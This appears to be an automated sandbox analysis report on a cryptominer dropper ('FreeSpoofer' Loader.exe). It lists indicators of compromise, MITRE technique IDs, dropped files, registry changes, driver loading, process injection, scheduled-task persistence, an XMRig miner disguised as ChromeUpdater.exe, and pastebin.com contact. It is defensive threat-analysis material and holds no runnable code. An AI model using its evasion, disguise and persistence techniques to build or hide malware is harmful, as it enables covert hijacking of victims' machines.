xmrig | 92362fe11f69225f240fab45a39ea7b1b385e35c9921812c871bb349f94b28a3

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions	Loader.exe

XMRig Miner payload 10 IoCs

miner

resource	yara_rule
behavioral1/memory/2940-98-0x000000013F310000-0x000000013FCDA000-memory.dmp	xmrig
behavioral1/memory/2504-101-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2504-154-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2504-174-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2504-177-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2388-181-0x000000013F2F0000-0x000000013FCBA000-memory.dmp	xmrig
behavioral1/memory/2504-183-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2504-185-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2504-187-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig
behavioral1/memory/2504-189-0x0000000140000000-0x00000001407EF000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
408	powershell.exe
352	powershell.exe
1068	powershell.exe
1032	powershell.exe
1128	powershell.exe
2164	powershell.exe
768	powershell.exe
1604	powershell.exe

Looks for VMWare Tools registry key 2 TTPs 1 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools	Loader.exe

Sets service image path in registry 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PbUvSWNrIwxxFLXJuZywfXYMy\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\PbUvSWNrIwxxFLXJuZywfXYMy"	HwTEknTZffvlUbHxuLDNsrZCQIGbvd.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\pDUelUFAAewgvNjRtPLTEfnRf\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\pDUelUFAAewgvNjRtPLTEfnRf"	ccOxsQVCyPPfMrkxWfrfMnLsWPgAte.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Loader.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Loader.exe

Executes dropped EXE 8 IoCs

pid	Process
2812	HwTEknTZffvlUbHxuLDNsrZCQIGbvd.exe
2600	eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe
2944	FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe
2940	ChromeUpdater.exe
2360	ccOxsQVCyPPfMrkxWfrfMnLsWPgAte.exe
2752	JTqVhdsyithHueOLWnFrwbBdWWVJVs.exe
988	UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe
2388	ChromeUpdater.exe

Loads dropped DLL 6 IoCs

pid	Process
2288	Loader.exe
2288	Loader.exe
2380	taskeng.exe
2288	Loader.exe
2288	Loader.exe
2380	taskeng.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
5	pastebin.com
4	pastebin.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	Loader.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	Loader.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2940 set thread context of 2204	2940	ChromeUpdater.exe	82
PID 2940 set thread context of 2504	2940	ChromeUpdater.exe	83

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\ChromeUpdater.exe	FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe
File created	C:\Program Files\Google\Libs\WR64.sys	ChromeUpdater.exe
File created	C:\Program Files\Google\Chrome\ChromeUpdater.exe	UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe
File created	C:\Program Files\Google\Libs\WR64.sys	ChromeUpdater.exe

Drops file in Windows directory 21 IoCs

description	ioc	Process
File created	C:\Windows\SoftwareDistribution\Download\rpoaJiPszTLYVVQHoRiWVwggluplmB.exe	Loader.exe
File created	C:\Windows\SoftwareDistribution\Download\peaUnwdJDqfYGxrvLIkmwIqSvJHpPs.sys	Loader.exe
File opened for modification	C:\Windows\SoftwareDistribution\Download\sOhfCGaIrLanSyRtAcyZkbGaEHckXF.sys	Loader.exe
File created	C:\Windows\Cursors\ZNGvOeeUcshXyEMmfBmjqjqZbSGjyy.sys	Loader.exe
File opened for modification	C:\Windows\Cursors\ZNGvOeeUcshXyEMmfBmjqjqZbSGjyy.sys	Loader.exe
File opened for modification	C:\Windows\Cursors\VeoAqujPmHyNxdVPsglXimurRayeaS.sys	Loader.exe
File created	C:\Windows\Cursors\nquwFtVpDrjedKLcPWlTSybvVrmwMb.exe	Loader.exe
File created	C:\Windows\SoftwareDistribution\Download\AKWKfcGgsOMdkETlGXYaJPQgYsbNqN.sys	Loader.exe
File created	C:\Windows\SoftwareDistribution\Download\lmPSqyuhFhCTtppmzwJiYUsDQWRnbg.sys	Loader.exe
File opened for modification	C:\Windows\SoftwareDistribution\Download\rpoaJiPszTLYVVQHoRiWVwggluplmB.exe	Loader.exe
File created	C:\Windows\SoftwareDistribution\Download\txtyxhSjWBvKFTRDQhpTORfnOyjOCp.exe	Loader.exe
File opened for modification	C:\Windows\SoftwareDistribution\Download\txtyxhSjWBvKFTRDQhpTORfnOyjOCp.exe	Loader.exe
File created	C:\Windows\Cursors\HwTEknTZffvlUbHxuLDNsrZCQIGbvd.exe	Loader.exe
File opened for modification	C:\Windows\SoftwareDistribution\Download\peaUnwdJDqfYGxrvLIkmwIqSvJHpPs.sys	Loader.exe
File created	C:\Windows\SoftwareDistribution\Download\eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe	Loader.exe
File created	C:\Windows\SoftwareDistribution\Download\tKNZaebxAJeZcodKcXiYvQOzEkfoFm.sys	Loader.exe
File opened for modification	C:\Windows\SoftwareDistribution\Download\tKNZaebxAJeZcodKcXiYvQOzEkfoFm.sys	Loader.exe
File created	C:\Windows\SoftwareDistribution\Download\sOhfCGaIrLanSyRtAcyZkbGaEHckXF.sys	Loader.exe
File created	C:\Windows\Cursors\VeoAqujPmHyNxdVPsglXimurRayeaS.sys	Loader.exe
File opened for modification	C:\Windows\Cursors\nquwFtVpDrjedKLcPWlTSybvVrmwMb.exe	Loader.exe
File opened for modification	C:\Windows\SoftwareDistribution\Download\AKWKfcGgsOMdkETlGXYaJPQgYsbNqN.sys	Loader.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 54 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JTqVhdsyithHueOLWnFrwbBdWWVJVs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Enumerates system info in registry 2 TTPs 38 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\7	reg.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\8	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "4841653-05866bce-A"	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\6	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\8	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\4	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Configuration Data	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\4	reg.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Configuration Data	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\2	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Component Information	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\3	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\6	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\2	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\5	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\9	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\9	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "9613114-8d2abece-A"	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\7	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Component Information	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\3	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\5	reg.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f06e9643e239db01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2964	schtasks.exe
2224	schtasks.exe
1808	schtasks.exe
1608	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2288	Loader.exe
2288	Loader.exe
2600	eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe
2944	FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe
2944	FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe
2164	powershell.exe
2944	FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe
2944	FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe
408	powershell.exe
2944	FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe
2944	FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe
2944	FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe
2944	FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe
2940	ChromeUpdater.exe
2940	ChromeUpdater.exe
768	powershell.exe
2940	ChromeUpdater.exe
2940	ChromeUpdater.exe
352	powershell.exe
2940	ChromeUpdater.exe
2940	ChromeUpdater.exe
2940	ChromeUpdater.exe
2940	ChromeUpdater.exe
2504	explorer.exe
2504	explorer.exe
2504	explorer.exe
2504	explorer.exe
2504	explorer.exe
2504	explorer.exe
2504	explorer.exe
2504	explorer.exe
2504	explorer.exe
2504	explorer.exe
2504	explorer.exe
2288	Loader.exe
2504	explorer.exe
2752	JTqVhdsyithHueOLWnFrwbBdWWVJVs.exe
2504	explorer.exe
2504	explorer.exe
2504	explorer.exe
2504	explorer.exe
2504	explorer.exe
2504	explorer.exe
2504	explorer.exe
2504	explorer.exe
2504	explorer.exe
2504	explorer.exe
2504	explorer.exe
2504	explorer.exe
2504	explorer.exe
2504	explorer.exe
2504	explorer.exe
988	UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe
988	UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe
1604	powershell.exe
2504	explorer.exe
988	UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe
988	UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe
1068	powershell.exe
988	UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe
988	UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe
988	UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe
988	UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe
2504	explorer.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
2812	HwTEknTZffvlUbHxuLDNsrZCQIGbvd.exe
2360	ccOxsQVCyPPfMrkxWfrfMnLsWPgAte.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	2288	Loader.exe
Token: SeLoadDriverPrivilege	2812	HwTEknTZffvlUbHxuLDNsrZCQIGbvd.exe
Token: SeDebugPrivilege	2600	eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe
Token: SeDebugPrivilege	2164	powershell.exe
Token: SeDebugPrivilege	408	powershell.exe
Token: SeDebugPrivilege	768	powershell.exe
Token: SeDebugPrivilege	352	powershell.exe
Token: SeLockMemoryPrivilege	2504	explorer.exe
Token: SeLoadDriverPrivilege	2360	ccOxsQVCyPPfMrkxWfrfMnLsWPgAte.exe
Token: SeDebugPrivilege	2752	JTqVhdsyithHueOLWnFrwbBdWWVJVs.exe
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeDebugPrivilege	1068	powershell.exe
Token: SeDebugPrivilege	1128	powershell.exe
Token: SeDebugPrivilege	1032	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2288	Loader.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2288 wrote to memory of 2812	2288	Loader.exe	32
PID 2288 wrote to memory of 2812	2288	Loader.exe	32
PID 2288 wrote to memory of 2812	2288	Loader.exe	32
PID 2288 wrote to memory of 2600	2288	Loader.exe	35
PID 2288 wrote to memory of 2600	2288	Loader.exe	35
PID 2288 wrote to memory of 2600	2288	Loader.exe	35
PID 2288 wrote to memory of 2600	2288	Loader.exe	35
PID 2600 wrote to memory of 2840	2600	eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe	37
PID 2600 wrote to memory of 2840	2600	eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe	37
PID 2600 wrote to memory of 2840	2600	eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe	37
PID 2600 wrote to memory of 2840	2600	eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe	37
PID 2840 wrote to memory of 2020	2840	cmd.exe	39
PID 2840 wrote to memory of 2020	2840	cmd.exe	39
PID 2840 wrote to memory of 2020	2840	cmd.exe	39
PID 2840 wrote to memory of 2020	2840	cmd.exe	39
PID 2840 wrote to memory of 1468	2840	cmd.exe	40
PID 2840 wrote to memory of 1468	2840	cmd.exe	40
PID 2840 wrote to memory of 1468	2840	cmd.exe	40
PID 2840 wrote to memory of 1468	2840	cmd.exe	40
PID 2840 wrote to memory of 320	2840	cmd.exe	41
PID 2840 wrote to memory of 320	2840	cmd.exe	41
PID 2840 wrote to memory of 320	2840	cmd.exe	41
PID 2840 wrote to memory of 320	2840	cmd.exe	41
PID 2840 wrote to memory of 1724	2840	cmd.exe	42
PID 2840 wrote to memory of 1724	2840	cmd.exe	42
PID 2840 wrote to memory of 1724	2840	cmd.exe	42
PID 2840 wrote to memory of 1724	2840	cmd.exe	42
PID 2840 wrote to memory of 2284	2840	cmd.exe	43
PID 2840 wrote to memory of 2284	2840	cmd.exe	43
PID 2840 wrote to memory of 2284	2840	cmd.exe	43
PID 2840 wrote to memory of 2284	2840	cmd.exe	43
PID 2840 wrote to memory of 1660	2840	cmd.exe	44
PID 2840 wrote to memory of 1660	2840	cmd.exe	44
PID 2840 wrote to memory of 1660	2840	cmd.exe	44
PID 2840 wrote to memory of 1660	2840	cmd.exe	44
PID 2840 wrote to memory of 1912	2840	cmd.exe	45
PID 2840 wrote to memory of 1912	2840	cmd.exe	45
PID 2840 wrote to memory of 1912	2840	cmd.exe	45
PID 2840 wrote to memory of 1912	2840	cmd.exe	45
PID 2840 wrote to memory of 1900	2840	cmd.exe	46
PID 2840 wrote to memory of 1900	2840	cmd.exe	46
PID 2840 wrote to memory of 1900	2840	cmd.exe	46
PID 2840 wrote to memory of 1900	2840	cmd.exe	46
PID 2840 wrote to memory of 1824	2840	cmd.exe	47
PID 2840 wrote to memory of 1824	2840	cmd.exe	47
PID 2840 wrote to memory of 1824	2840	cmd.exe	47
PID 2840 wrote to memory of 1824	2840	cmd.exe	47
PID 2840 wrote to memory of 988	2840	cmd.exe	48
PID 2840 wrote to memory of 988	2840	cmd.exe	48
PID 2840 wrote to memory of 988	2840	cmd.exe	48
PID 2840 wrote to memory of 988	2840	cmd.exe	48
PID 2840 wrote to memory of 1700	2840	cmd.exe	49
PID 2840 wrote to memory of 1700	2840	cmd.exe	49
PID 2840 wrote to memory of 1700	2840	cmd.exe	49
PID 2840 wrote to memory of 1700	2840	cmd.exe	49
PID 2840 wrote to memory of 328	2840	cmd.exe	50
PID 2840 wrote to memory of 328	2840	cmd.exe	50
PID 2840 wrote to memory of 328	2840	cmd.exe	50
PID 2840 wrote to memory of 328	2840	cmd.exe	50
PID 2840 wrote to memory of 2860	2840	cmd.exe	51
PID 2840 wrote to memory of 2860	2840	cmd.exe	51
PID 2840 wrote to memory of 2860	2840	cmd.exe	51
PID 2840 wrote to memory of 2860	2840	cmd.exe	51
PID 2840 wrote to memory of 1708	2840	cmd.exe	52

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1228
- C:\Users\Admin\AppData\Local\Temp\FreeSpoofer\Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\FreeSpoofer\Loader.exe"
  2⤵
  - Looks for VirtualBox Guest Additions in registry
  - Looks for VMWare Tools registry key
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Maps connected drives based on registry
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2288
- - C:\Windows\Cursors\HwTEknTZffvlUbHxuLDNsrZCQIGbvd.exe
    "C:\Windows\Cursors\HwTEknTZffvlUbHxuLDNsrZCQIGbvd.exe" C:\Windows\SoftwareDistribution\Download\lmPSqyuhFhCTtppmzwJiYUsDQWRnbg.sys
    3⤵
    - Sets service image path in registry
    - Executes dropped EXE
    - Suspicious behavior: LoadsDriver
    - Suspicious use of AdjustPrivilegeToken
    PID:2812
- - C:\Windows\SoftwareDistribution\Download\eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe
    "C:\Windows\SoftwareDistribution\Download\eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
